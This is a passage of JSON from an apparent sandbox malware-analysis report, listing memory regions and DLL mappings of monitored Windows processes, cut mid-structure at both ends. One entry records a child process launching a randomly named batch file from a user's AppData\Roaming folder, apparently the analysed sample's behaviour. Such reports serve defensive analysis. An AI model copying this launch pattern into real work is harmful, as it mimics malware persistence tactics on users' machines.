"name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:06.449", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001475-addr_0x0000000000230000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_356", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_1475", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:06.449", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1242497024, "type": "region", "version": 1 }, "end_va": 1242808319, "entry_point": 1242530458, "filename": "\\Windows\\SysWOW64\\cmd.exe", "id": "region_1476", "name": "cmd.exe", "norm_filename": "c:\\windows\\syswow64\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1242497024, "timestamp": "00:01:06.449", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1477", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:06.449", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1478", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:06.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1479", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:06.450", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001480-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_357", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1480", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:06.451", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001481-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_358", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1481", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:06.451", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001482-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_359", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1482", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:06.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1483", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:06.451", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001484-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_360", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1484", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:06.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1485", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:06.452", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001486-addr_0x0000000000480000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_361", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_1486", "name": "private_0x0000000000480000", "norm_filename": null, "region_type": "private_memory", "start_va": 4718592, "timestamp": "00:01:06.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1487", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:06.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1488", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:06.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1489", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:06.459", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001490-addr_0x00000000774a0000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_362", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_1490", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:06.460", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001491-addr_0x00000000775a0000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_363", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_1491", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:06.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1507", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:06.595", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1508", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:06.595", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1509", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:06.595", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001510-addr_0x0000000000470000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_364", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4718591, "entry_point": 0, "filename": null, "id": "region_1510", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:06.596", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001511-addr_0x0000000000650000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_365", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 0, "filename": null, "id": "region_1511", "name": "private_0x0000000000650000", "norm_filename": null, "region_type": "private_memory", "start_va": 6619136, "timestamp": "00:01:06.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1945829376, "type": "region", "version": 1 }, "end_va": 1945858047, "entry_point": 1945834032, "filename": "\\Windows\\SysWOW64\\winbrand.dll", "id": "region_1512", "name": "winbrand.dll", "norm_filename": "c:\\windows\\syswow64\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1945829376, "timestamp": "00:01:06.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1513", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:06.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1514", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:06.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1515", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:06.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1516", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:06.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1517", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:06.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1518", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:06.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1519", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:06.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1520", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:06.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1521", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:06.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1522", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:06.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1523", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:06.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1524", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:06.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1525", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:06.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1526", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:06.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 9273343, "entry_point": 0, "filename": null, "id": "region_1527", "name": "pagefile_0x0000000000750000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7667712, "timestamp": "00:01:06.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1528", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:06.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1529", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:06.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1530", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:06.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_1531", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:06.613", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001532-addr_0x0000000000130000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_366", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_1532", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:01:06.614", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001533-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_367", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1533", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:06.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 10883071, "entry_point": 0, "filename": null, "id": "region_1534", "name": "pagefile_0x00000000008e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9306112, "timestamp": "00:01:06.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10944512, "type": "region", "version": 1 }, "end_va": 31916031, "entry_point": 0, "filename": null, "id": "region_1535", "name": "pagefile_0x0000000000a70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10944512, "timestamp": "00:01:06.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 31916032, "type": "region", "version": 1 }, "end_va": 35336191, "entry_point": 0, "filename": null, "id": "region_1536", "name": "pagefile_0x0000000001e70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31916032, "timestamp": "00:01:06.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 2195455, "entry_point": 1376256, "filename": "\\Windows\\Branding\\Basebrd\\basebrd.dll", "id": "region_1538", "name": "basebrd.dll", "norm_filename": "c:\\windows\\branding\\basebrd\\basebrd.dll", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:01:06.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 39530495, "entry_point": 0, "filename": null, "id": "region_1540", "name": "pagefile_0x00000000021c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35389440, "timestamp": "00:01:06.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 39583744, "type": "region", "version": 1 }, "end_va": 42528767, "entry_point": 39583744, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1541", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 39583744, "timestamp": "00:01:06.650", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "cmd /c \"\"C:\\Users\\kFT6uTQW\\AppData\\Roaminghhfhqi2h.wln.bat\"\"", "filename": "c:\\windows\\syswow64\\cmd.exe", "id": "proc_10", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 10, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1856", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:15.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1857", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:15.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1858", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:15.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1859", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:15.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1860", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:15.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_1861", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:15.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 